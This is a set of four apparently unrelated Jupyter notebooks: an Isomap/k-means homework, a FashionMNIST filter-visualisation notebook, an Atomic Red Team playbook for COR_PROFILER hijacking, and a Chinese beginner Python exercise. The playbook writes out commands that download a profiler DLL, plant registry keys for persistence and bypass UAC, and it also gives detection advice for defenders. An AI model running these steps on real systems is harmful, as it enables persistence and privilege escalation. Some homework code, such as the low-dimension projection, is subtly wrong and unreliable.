# __3.__ Once you have the distance matrix, obtain the matrix of scalar products by squaring the distances and applying double centering
#
# $$\mathbf{S} = -\frac{1}{2}(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)\mathbf{D}^2(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)$$
#
# where $\mathbf{1} = \left[1,1,\ldots,1\right]$ is a vector of all ones and $\mathbf{I}$ is the indentity matrix.
#
# __4.__ Compute the graph representation. The graph $\mathcal{G} = (\mathcal{V}, \mathcal{E})$ si defined on a set of vertices $\mathcal{V}$ and a set of edges between those vertices $\mathcal{E}$. The set of vertices corresponds to the set of images in the original dataset. The set of edges will be defined according to the $K$-rule as explained below.
#
# We will represent the graph through its adjacency matrix $A$ where $A_{ij} = 1$ if we draw an edge between vertex $i$ and vertex $j$. To build this adjacency matrix, we will add an edge between image $\mathbf{x}_i$ and image $\mathbf{x}_j$ whenever $\mathbf{x}_j$ is among the $K$ nearest neighbors of $\mathbf{x}_i$.
#
#
#
# # Solution
# ### Create List of 3's and 4's
# +
n_samples, n_features = X.shape
lst_3 = []
lst_4 = []
for id, value in enumerate(y):
if value == 3:
lst_3.append(X[id])
elif value == 4:
lst_4.append(X[id])
lst_3 = np.array(lst_3)
lst_4 = np.array(lst_4)
num_concat = np.concatenate((lst_3, lst_4))
targets = np.concatenate((3*np.ones(lst_3.shape[0]), 4*np.ones(lst_4.shape[0])))
print("Num of Samples: {} \nTotal features: {}\n".format(n_samples, n_features))
print("Target list: \n{}".format(targets))
# -
X_mean = num_concat - np.mean(num_concat)
print("\nCenter of X: \n{}\n \nMean of X is: {}".format(X_mean, X_mean.mean()))
# ## Computing S using:
# $$\mathbf{S} = -\frac{1}{2}(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)\mathbf{D}^2(\mathbf{I} - \frac{1}{n}\mathbf{1}\mathbf{1}^T)$$
# +
def center(X):
dist_mat = pairwise_distances(X_mean)
dist_squ = np.square(dist_mat)
instance = np.shape(dist_squ)[0]
'''Ones on the diagonal and zeros elsewhere'''
I = np.eye(instance)
E = np.ones((instance, 1))
# S = np.dot((I - (1/instance)*np.dot(E, E.T)), dist_squ)
# S = np.dot(S, (I - (1/instance)*np.dot(E, E.T)))
# S = (-1/2)*S
S_first_term = np.dot((I - (1/instance)*np.dot(E, E.T)), dist_squ)
S_second_term = (I - (1/instance)*np.dot(E, E.T))
S = (-1/2)*np.dot(S_first_term, S_second_term)
return S
S = center(X_mean)
print("Shape of S: {}".format(S.shape))
# -
# ### Nearest Neighbour
def near_neighbor(k, X_mean):
k_mat = np.zeros((len(X_mean), k))
D = pairwise_distances(X_mean.astype(np.float64))
for val in range(len(X_mean)):
k_mat[val] = D[val,:].argsort()[1:k+1]
print("Shape of D is: {}\n\nK Neighbor Matrix: \n{}".format(D.shape,k_mat))
return k_mat, D
k = 5
k_mat, D = near_neighbor(k, X_mean)
# ### Creating Adjaceny Matrix (Graph)
# +
def mat_adjacency(K, S, D):
A = np.zeros(shape = D.shape)
for val in range(S.shape[0]):
for val2 in range(S.shape[1]):
if val == val2:
continue
elif val2 in K[val]:
A[val][val2] = 1
else:
A[val][val2] = 999
print("A Matrix is: \n\n{}\n".format(A))
return A
S_mat = center(X_mean)
A = mat_adjacency(k_mat, S_mat, D)
# -
# # Question II.1.2 Computing the geodesic distances (5pts)
#
# __1.__ Once we have the graph representation of the data, we need to compute the shortest path between any two vertices in this graph (shortest geodesic distance between any two images). To do that, connect the vertices that were not connected by the K nearest neighbors approach, with an edge of sufficiently large weight (To avoid having to take huge values, you might want to normalize the distances (resp scalar product) for example by normalizing by the norm of the matrix). You should then have an adjacency matrix $\mathbf{A}$ with $0$ on the diagonal and such that $A_{ij} = 1$ if the two images are connected and $A_{ij} = \inf$ or some large number if they are not.
#
#
# __2.__ Let us denote the updated adjacency matrix as $\tilde{\mathbf{A}}$. From this matrix, we will now compute the shortest geodesic distance. That can be done through the Floyd-Warshall algorithm as indicated below.
#
# ### code the Floyd Warshall algorithm as follows
# for k = 1 to n
#
# for i =1 to n
#
# for j = 1 to n
#
#
# $$\tilde{A}_{ij}\leftarrow\min(A_{ij}, A_{ik + A_{kj}})$$
#
# ## Solution
def Floyd_Warshall(A, N):
d = deepcopy(A)
for k in range(N):
for j in range(N):
for i in range(N):
d[i][j] = min(d[i][j], d[i][k]+ d[k][j])
return d
# + run_control={"marked": false}
N = A.shape[0]
d = Floyd_Warshall(A, N)
# -
print("Shape of d: {}\nd[0] is: \n{}\n".format(d.shape, d[0]))
# # Question II.1.3 Low dimensional projection (2pts)
#
# To conclude, from the matrix of geodesic distances, compute the low dimensional representation. Do this by
#
# 1. First getting the singular value decomposition of the geodesic distance matrix as $\mathbf{S}_\mathcal{G} = \mathbf{U}\mathbf{\Lambda}\mathbf{U}^T$. Define the projection as $\mathbf{I_{P\times N}}\mathbf{\Lambda}^{1/2}\mathbf{U}^T$ with $P=2$ (that is retain the first two rows of the matrix $\mathbf{\Lambda}^{1/2}\mathbf{U}^T$).
#
# 2. Represent each image $\mathbf{x}_i$ from the $2$ tuple encoded in the $i^{th}$ column of $\mathbf{I}_{2\times N}\mathbf{\Lambda}^{1/2}\mathbf{U}^T$. Display the result below.
#
# ##### Email Question Correction
# There is a mistake in Assignment 4, Question II.1.3. You have to compute the eigenvalue decomposition (U Lambda U^T) of the scalar product matrix S obtained from the square of the geodesic distance matrix (S can be obtained from D^2 through double centering) and not from the geodesic distance matrix itself. In other words, from the Floyd Warshall algorithm, you get the graph (geodesic) distance matrix. But then, as you did in Q. II.1.1, you need to square the matrix of distances and then get the scalar product matrix from D^2 by using double centering, i.e.
# S_G = -1/2 (I - (1/n)11^T)D^2_G(I - (1/n)11^T)
#
# Once you have S_G you can get the low dimensional representation by computing the eigenvalue decomposition and retaining the first two rows from Lambda^(1/2)U^T
#
# if you have done the computations for D, doing it for S is straightforward though
# # Solution
# +
def low_dimension(d):
w, v = LA.eig(d)
S = center(d)
S_gra = np.dot(np.sqrt(v), S.T)
I = np.identity(364)
f = np.dot(I, S_gra)
x = f[0].real
y = f[1].real
U_U = []
for i in range(x.shape[0]):
c = np.array([x[i], y[i]])
U_U.append(c)
U_U = np.asarray(U_U)
plt.rcParams['figure.facecolor'] = 'white'
plt.rcParams['axes.facecolor'] = '#FDEDEC'
plt.scatter(U_U[:183, 0], U_U[:183, 1], s = 20, marker = 'x', cmap = "cool", alpha = 0.8)
plt.scatter(U_U[183:, 0], U_U[183:, 1], s = 20, marker = 'x', cmap = "cool", alpha = 0.8)
return U_U
U_U = low_dimension(d)
# -
print("\nSome Values returned by Low_dimensionality Function:\n \n{}\n".format(U_U[:10]))
# ### Exercise II.2. (K-means)
# # Question II.2.1 (8pts)
#
# Now that we have a two dimensional representation for the images. We will use a clustering algorithm to learn how to distinguish between the two digits.
#
#
# __1.__ Start by splitting the dataset into a training and a validation set (let us take $90\%$ training and $10\%$ validation).
#
# __2.__ Initialize the $K$-means algorithm with $2$ centroids located at random positions
#
# __3.__ Assign each point to its nearest centroid as
#
# $$\mathcal{C}(\mathbf{x}_i) \leftarrow \underset{k}{\operatorname{argmin}} \|\mathbf{x}_i - \mathbf{c}_{k}\|^2$$
#
# __4.__ Update the centroids as
#
# $$\mathbf{c}_k \leftarrow \frac{1}{N_k}\sum_{\ell\in \mathcal{C}_k}\mathbf{x}_\ell,\quad k=1,2.$$
#
# __5.__ Make sure to properly treat empty clusters. If you end up with an empty cluster, restart the iterations by splitting the single cluter you have into two sub-clusters and define your new centroids as the centers of mass of those clusters.
#
# # Solution
#
# Use this Equation
# $$\mathbf{c}_k \leftarrow \frac{1}{N_k}\sum_{\ell\in \mathcal{C}_k}\mathbf{x}_\ell,\quad k=1,2.$$
def K_means(X):
np.random.shuffle(X)
'''Using 90% for test and 10% for validate'''
id_break = round(0.9*X.shape[0])
train = deepcopy(X[:id_break])
test = deepcopy(X[id_break:])
K, instance, count = 2, train.shape[0], train.shape[1]
''' Mean, STD and Centeriods'''
mean = np.mean(train, axis = 0)
std = np.std(train, axis = 0)
center = np.random.randn(K,count)*std + mean
'''Previous and New current centers'''
center_prev = np.zeros(center.shape)
center_curr = deepcopy(center)
'''Clusters'''
clusters = np.zeros(instance)
distances = np.zeros((instance,K))
err = np.linalg.norm(center_curr - center_prev)
'''Updating until Error = 0'''
while err != 0:
for i in range(K):
distances[:,i] = np.linalg.norm(train - center_curr[i], axis=1)
clusters = np.argmin(distances, axis = 1)
center_prev = deepcopy(center_curr)
for i in range(K):
center_curr[i] = np.mean(train[clusters == i], axis=0)
err = np.linalg.norm(center_curr - center_prev)
labels = pairwise_distances_argmin(train, center_curr)
print("Labels are: \n\n{}\n\n Centeriods of the two clusters are: \n {}".format(labels,center_curr))
print("\n\nVisual Representation of two clusters")
plt.rcParams['figure.facecolor'] = 'white'
plt.rcParams['axes.facecolor'] = '#FDEDEC'
plt.scatter(train[:, 0], train[:, 1], c = labels, s = 20, marker = 'x', cmap = "cool", alpha = 0.8)
return train, test, labels, err, center_curr
train, test, labels, error, center = K_means(U_U)
# ## Testing on Validation
new_label = pairwise_distances_argmin(test, center)
print("\nVisual Representation of Clusters on Validation Dataset")
plt.scatter(test[:, 0], test[:, 1], c = new_label, s = 20, marker = 'x', cmap = "cool", alpha = 0.8)
# # End of Code For UnSupervised Section
| Regression_Tree_K-Means_Clustering_Reinforcement_Learning/Unsupervised_Learning_HW-03.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # FashionMNIST
# Load images from the [Fashion-MNIST data](https://github.com/zalandoresearch/fashion-mnist)
#
#
# The dataset comprised of 60,000 small square 28x28 pixel grayscale images of items of 10 types of clothing with 0-9 class labels.
# class labels:
# * 0: T-shirt/top
# * 1: Trouser
# * 2: Pullover
# * 3: Dress
# * 4: Coat
# * 5: Sandal
# * 6: Shirt
# * 7: Sneaker
# * 8: Bag
# * 9: Ankle boot
#
# ### Load the Fashion-MNIST data
# * Use ``torch.utils.data.dataset``
# * Data path: data
# * Apply transformations to the data (turning all images into Tensor's for training a NN
#
# ### Train and CNN to classify images
# * Load in both training and test datasets from the FashionMNIST class
#
#
#
# ## Import the Necessary Packages
# +
# basic torch libraries
import torch
import torchvision
# data loading and transforming
from torchvision.datasets import FashionMNIST
from torch.utils.data import DataLoader
from torchvision import transforms
# basic libraries
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# -
# ### The output of ``torchvision`` are PILImage images of range [0, 1]
# * Transform them to Tensor for input into a CNN
# +
# Defin a transform to read the data in as a Tensor
data_transform = transforms.ToTensor()
# Choose the training and test datasets
path = './data'
# Training datasets
train_data = FashionMNIST(root=path,
train=True,
download=False,
transform=data_transform)
# Test datasets
test_data = FashionMNIST(root=path,
train=False,
download=False,
transform=data_transform)
# Print out some stats about the training data
print('Train data, number of images', len(train_data))
# Print out some stats about the training data
print('Test data, number of images', len(test_data))
# -
# ## Data iteration and batching
# ``torch.utils.data.DataLoader`` is an iterator that allows to batch and shuffle the data
#
# +
# shuffle the data and load in image/label data in batches of size 20
# Depends on large or small size of batch size will affect the loss
batch_size = 20
# load train
train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True)
# load test
test_loader = DataLoader(test_data, batch_size=batch_size, shuffle=True)
# specify the image classes
classes = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
# -
# Using ``dataiter.next()`` for cell iterates over the training dataset of loaded a random batch image/label data.
#
# Plots the batch of images and labels in a ``2*batch_size/2`` grid.
#
# +
# obtain one batch of training images
# iter
dataiter = iter(train_loader)
images, labels = dataiter.next()
images = images.numpy() # convert to numpy
# plot the images in the batch with labels
fig = plt.figure(figsize=(25, 4)) # fig size
for idx in np.arange(batch_size):
ax = fig.add_subplot(2, batch_size/2, idx+1, xticks=[], yticks=[])
ax.imshow(np.squeeze(images[idx]), cmap='gray')
ax.set_title(classes[labels[idx]])
# -
# ### NN Architecture
# * Architecture for simple ConvNet [INPUT-CONV-RELU-POOL-FC]
# * [NN Layers](http://pytorch.org/docs/master/nn.html)
# * Flattening used for the output of conv/pooling layer to a linear layer. In Keras used ``Flatten()``. In Pytorch used an input x with ``x = x.view(x.size(0), -1)``
# * Keep tract output dimension for case ``output_dim = (W-F+2P)/S + 1``
# * Input volume size(W)
# * Receptive field size of the Conv Layer neurons(F)
# * The sride with which applied(S)
# * The amount of zero padding used(P)
#
# * Dropout randomly turns off perceptrons(nodes). It gives a way to balance network so that every node works equally towards the same goal, and if one makes a mistake, it won't dominate the behavior of our model. ``nn.Dropout()``
#
# We set dropout p = 0.9 which means each epoch, each nodes get turned off with a probabilit 90percent.
#
#
# # Necessary Packages for NN Module
import torch.nn as nn
import torch.nn.functional as F
# +
# Define Layers of a model
# Will use [INPUT-CONV-RELU-POOL-CONV-RELU-POOL-FC]
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# 1 input image channel(grayscale), 10 output channels/features maps
# Applies a 2D convolution over an input signal composed of several input planes.
# 3x3 square convolution kernel
# output_dim = (28-3)/1 + 1 = 26
# output Tensor for one image will have the dimensions: (10, 26, 26)
self.conv1 = nn.Conv2d(1, 10, 3)
# maxpool layer with kernel_size=2, stride=2
# Output_dim = 26/2 = 13
# output Tensor for one image will have the dimensions: (10, 13, 13)
self.pool = nn.MaxPool2d(2,2)
# Apply Second conv layer: 10 inputs, 20 outputs
# 3x3 square convolution kernel
# output_dim = (13-3)/1 + 1 = 11
# output Tensor for one image will have the dimensions: (20, 11, 11)
self.conv2 = nn.Conv2d(10, 20, 3)
# Outpu_dim for pooling after secon conv (20, 5, 5); 5.5 is rounded down
######
# FC
# # 20 outputs * the 5*5 filtered/poled map size
# # 10 output channels (for the 10 classes)
# self.fc1 = nn.Linear(20*5*5, 10)
# pool 10 -> 50
self.fc1 = nn.Linear(20*5*5, 50)
######
# dropout with p=0.4
self.fc1_drop = nn.Dropout(p=0.4)
# finally, create 10 output channels (for the 10 classes)
self.fc2 = nn.Linear(50, 10)
######
# feedforward behavior
def forward(self, x):
# Apply [CONV-RELU-POOL-CONV-RELU-POOL]
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
# Flattening used for the output of conv/pooling layer to a linear laye
# Flatten the inputs into a vector
x = x.view(x.size(0), -1)
# One linear layer
x = F.relu(self.fc1(x))
# # Apply softmax layer to convert the 10 outputs (0-9) into a distribution prob of class scores
# x = F.log_softmax(x, dim=1)
####
# two linear layers with dropout in between
x = self.fc1_drop(x)
x = self.fc2(x)
####
return x
# -
# # Load in our trained net
# Will instantiate a model and load in an already trained network.
#
# * In the directory ``saved_models/``, trained data is saved from previous work.
# +
# Instantiate and print Net
net = Net()
# load the net parameter by name
path = 'saved_models/fashion_net_ex.pt'
net.load_state_dict(torch.load(path))
print(net)
# -
# # Feature Visualization
# This Feature Viz method is to understand how inner work(how machine recognize pattern).CNN's are actually learning to recognize a variety of spatial patterns and you can visualize what each convolutional layer has been trained to recognize by looking at the weights that make up each convolutional kernel and applying those one at a time to a sample image.
#
#
# In the cell below, you'll see how to extract and visualize the filter weights for all of the filters in the first convolutional layer.
#
# Note the patterns of light and dark pixels and see if you can tell what a particular filter is detecting. For example, the filter pictured in the example below has dark pixels on either side and light pixels in the middle column, and so it may be detecting vertical edges.
#
# <img src='edge_filter_ex.png' width= 30% height=30%/>
#
#
# ### First Conv Layer
# +
# Get the weights in the first conv layer
weights = net.conv1.weight.data
w = weights.numpy()
# for 10 filters
fig=plt.figure(figsize=(20, 8))
columns = 5
rows = 2
for i in range(0, columns*rows):
fig.add_subplot(rows, columns, i+1)
plt.imshow(w[i][0], cmap='gray')
print('First convolutional layer')
plt.show()
weights = net.conv2.weight.data
w = weights.numpy()
# -
# ### Activation Maps
# Next, you'll see how to use OpenCV's filter2D function to apply these filters to a sample test image and produce a series of activation maps as a result. We'll do this for the first and second convolutional layers and these activation maps whould really give you a sense for what features each filter learns to extract.
# +
# obtain one batch of testing images
dataiter = iter(test_loader)
images, labels = dataiter.next()
images = images.numpy()
# select an image by index
idx = 3
img = np.squeeze(images[idx])
# Use OpenCV's filter2D function
# apply a specific set of filter weights (like the one's displayed above) to the test image
import cv2
plt.imshow(img, cmap='gray')
weights = net.conv1.weight.data
w = weights.numpy()
# 1. first conv layer
# for 10 filters
fig=plt.figure(figsize=(30, 10))
columns = 5*2
rows = 2
for i in range(0, columns*rows):
fig.add_subplot(rows, columns, i+1)
if ((i%2)==0):
plt.imshow(w[int(i/2)][0], cmap='gray')
else:
c = cv2.filter2D(img, -1, w[int((i-1)/2)][0])
plt.imshow(c, cmap='gray')
plt.show()
# -
# In top left corner, It has a negatively-weighted top row and positively weighted middel/bottom rows and seems to detect the horizontal edges of sleeves in a pullover
#
# ### Second Conv Layer
# +
# Same process but for the second conv layer (20, 3x3 filters):
plt.imshow(img, cmap='gray')
# second conv layer, conv2
weights = net.conv2.weight.data
w = weights.numpy()
# 1. first conv layer
# for 20 filters
fig=plt.figure(figsize=(30, 10))
columns = 5*2
rows = 2*2
for i in range(0, columns*rows):
fig.add_subplot(rows, columns, i+1)
if ((i%2)==0):
plt.imshow(w[int(i/2)][0], cmap='gray')
else:
c = cv2.filter2D(img, -1, w[int((i-1)/2)][0])
plt.imshow(c, cmap='gray')
plt.show()
# -
# In the second convolutional layer (conv2) the first filter looks like it may be dtecting the background color (since that is the brightest area in the filtered image) and the more vertical edges of a pullover.
| 06_Feature_Visualization_FashionMNIST/.ipynb_checkpoints/Feature_Viz_FashionMNIST-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .ps1
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: .NET (PowerShell)
# language: PowerShell
# name: .net-powershell
# ---
# # T1574.012 - Hijack Execution Flow: COR_PROFILER
# Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
#
# The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
#
# Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
# ## Atomic Tests
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
# ### Atomic Test #1 - User scope COR_PROFILER
# Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
# The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
# Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
# If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
# the notepad process will not execute with high integrity.
#
# Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
#
# **Supported Platforms:** windows
# #### Dependencies: Run with `powershell`!
# ##### Description: #{file_name} must be present
#
# ##### Check Prereq Commands:
# ```powershell
# if (Test-Path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) {exit 0} else {exit 1}
#
# ```
# ##### Get Prereq Commands:
# ```powershell
# New-Item -Type Directory (split-path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) -ErrorAction ignore | Out-Null
# Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll"
#
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 1 -GetPreReqs
# #### Attack Commands: Run with `powershell`
# ```powershell
# Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\{<KEY>}" -ForegroundColor Cyan
# New-Item -Path "HKCU:\Software\Classes\CLSID\{09108e71-974c-4010-89cb-acf471ae9e2c}\InprocServer32" -Value PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll -Force | Out-Null
# New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
# New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "{09108e71-974c-4010-89cb-acf471ae9e2c}" -Force | Out-Null
# New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll -Force | Out-Null
# Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
# START MMC.EXE EVENTVWR.MSC
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 1
# ### Atomic Test #2 - System Scope COR_PROFILER
# Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
# The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
# level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
# still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
#
# Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
#
# **Supported Platforms:** windows
# Elevation Required (e.g. root or admin)
# #### Dependencies: Run with `powershell`!
# ##### Description: #{file_name} must be present
#
# ##### Check Prereq Commands:
# ```powershell
# if (Test-Path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) {exit 0} else {exit 1}
#
# ```
# ##### Get Prereq Commands:
# ```powershell
# New-Item -Type Directory (split-path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) -ErrorAction ignore | Out-Null
# Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll"
#
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 2 -GetPreReqs
# #### Attack Commands: Run with `powershell`
# ```powershell
# Write-Host "Creating system environment variables" -ForegroundColor Cyan
# New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
# New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "{09108e71-974c-4010-89cb-acf471ae9e2c}" -Force | Out-Null
# New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll -Force | Out-Null
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 2
# ### Atomic Test #3 - Registry-free process scope COR_PROFILER
# Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
#
# Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
#
# **Supported Platforms:** windows
# #### Dependencies: Run with `powershell`!
# ##### Description: #{file_name} must be present
#
# ##### Check Prereq Commands:
# ```powershell
# if (Test-Path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) {exit 0} else {exit 1}
#
# ```
# ##### Get Prereq Commands:
# ```powershell
# New-Item -Type Directory (split-path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) -ErrorAction ignore | Out-Null
# Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll"
#
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 3 -GetPreReqs
# #### Attack Commands: Run with `powershell`
# ```powershell
# $env:COR_ENABLE_PROFILING = 1
# $env:COR_PROFILER = '{09108e71-974c-4010-89cb-acf471ae9e2c}'
# $env:COR_PROFILER_PATH = 'PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll'
# POWERSHELL -c 'Start-Sleep 1'
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 3
# ## Detection
# For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.
| playbook/tactics/privilege-escalation/T1574.012.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 基本程序设计
# - 一切代码输入,请使用英文输入法
print('hello word')
print 'hello'
# ## 编写一个简单的程序
# - 圆公式面积: area = radius \* radius \* 3.1415
radius = 1.0
area = radius * radius * 3.14 # 将后半部分的结果赋值给变量area
# 变量一定要有初始值!!!
# radius: 变量.area: 变量!
# int 类型
print(area)
# ### 在Python里面不需要定义数据的类型
# ## 控制台的读取与输入
# - input 输入进去的是字符串
# - eval
radius = input('请输入半径') # input得到的结果是字符串类型
radius = float(radius)
area = radius * radius * 3.14
print('面积为:',area)
# - 在jupyter用shift + tab 键可以跳出解释文档
# ## 变量命名的规范
# - 由字母、数字、下划线构成
# - 不能以数字开头 \*
# - 标识符不能是关键词(实际上是可以强制改变的,但是对于代码规范而言是极其不适合)
# - 可以是任意长度
# - 驼峰式命名
# ## 变量、赋值语句和赋值表达式
# - 变量: 通俗理解为可以变化的量
# - x = 2 \* x + 1 在数学中是一个方程,而在语言中它是一个表达式
# - test = test + 1 \* 变量在赋值之前必须有值
# ## 同时赋值
# var1, var2,var3... = exp1,exp2,exp3...
# ## 定义常量
# - 常量:表示一种定值标识符,适合于多次使用的场景。比如PI
# - 注意:在其他低级语言中如果定义了常量,那么,该常量是不可以被改变的,但是在Python中一切皆对象,常量也是可以被改变的
# ## 数值数据类型和运算符
# - 在Python中有两种数值类型(int 和 float)适用于加减乘除、模、幂次
# <img src = "../Photo/01.jpg"></img>
# ## 运算符 /、//、**
# ## 运算符 %
# ## EP:
# - 25/4 多少,如果要将其转变为整数该怎么改写
# - 输入一个数字判断是奇数还是偶数
# - 进阶: 输入一个秒数,写一个程序将其转换成分和秒:例如500秒等于8分20秒
# - 进阶: 如果今天是星期六,那么10天以后是星期几? 提示:每个星期的第0天是星期天
# ## 科学计数法
# - 1.234e+2
# - 1.234e-2
# ## 计算表达式和运算优先级
# <img src = "../Photo/02.png"></img>
# <img src = "../Photo/03.png"></img>
# ## 增强型赋值运算
# <img src = "../Photo/04.png"></img>
# ## 类型转换
# - float -> int
# - 四舍五入 round
# ## EP:
# - 如果一个年营业税为0.06%,那么对于197.55e+2的年收入,需要交税为多少?(结果保留2为小数)
# - 必须使用科学计数法
# # Project
# - 用Python写一个贷款计算器程序:输入的是月供(monthlyPayment) 输出的是总还款数(totalpayment)
# 
# # Homework
# - 1
# <img src="../Photo/06.png"></img>
celsius=eval(input('请输入摄氏温度'))
fahrenheit = (9/5) * celsius +32
print(fahrenheit)
# - 2
# <img src="../Photo/07.png"></img>
radius=eval(input('请输入半径'))
length=eval(input('请输入高'))
area = radius * radius * 3.1415
volume = area * length
print(volume)
round(volume,1)
# - 3
# <img src="../Photo/08.png"></img>
feet=eval(input('请输入英尺数'))
meters=feet*0.305
print(meters)
# - 4
# <img src="../Photo/10.png"></img>
M=eval(input('请输入单位为千克的水量'))
initialTemperature=eval(input('请输入初始温度'))
finalTemperature=eval(input('请输入最终温度'))
Q=M *(finalTemperature - initialTemperature) * 4184
print(Q)
# - 5
# <img src="../Photo/11.png"></img>
balance=eval(input('请输入差额'))
interest_rate=eval(input('请输入年利率'))
interest=balance*(interest_rate/1200)
print(interest)
round(interest,5)
# - 6
# <img src="../Photo/12.png"></img>
v0=eval(input('请输入以秒为单位的初始速度'))
v1=eval(input('请输入以秒为单位的末速度'))
t=eval(input('以秒为单位速度变化所占用的时间'))
a=(v1-v0)/t
